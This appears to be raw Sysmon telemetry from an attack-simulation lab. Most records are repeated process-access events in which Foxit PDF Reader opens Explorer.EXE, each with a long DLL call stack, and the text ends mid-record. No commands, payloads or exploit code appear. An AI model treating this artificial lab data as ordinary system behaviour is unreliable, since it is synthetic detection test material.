10341000x800000000000000039484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e235b(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e235b(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e230f(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 10341000x800000000000000039481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e230f(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 10341000x800000000000000039480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e230f(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64) 10341000x800000000000000039479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e230f(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 23542300x800000000000000015029Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:41.262{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DFFE98A62FBBF712A5AE1F2D6AE151,SHA256=2BDB4A78F2C74833F76C334DA7EB4A2CFB246B59A8333460967E206B2672B75F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e212f(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e212f(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e212f(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e212f(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64) 10341000x800000000000000039474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20f8(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20f8(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20f8(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20f8(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64) 10341000x800000000000000039470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20c3(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20c3(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64)|C:\Windows\System32\ieframe.dll+f17a9(wow64) 10341000x800000000000000039468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e20c3(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64) 10341000x800000000000000039467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+193945(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.d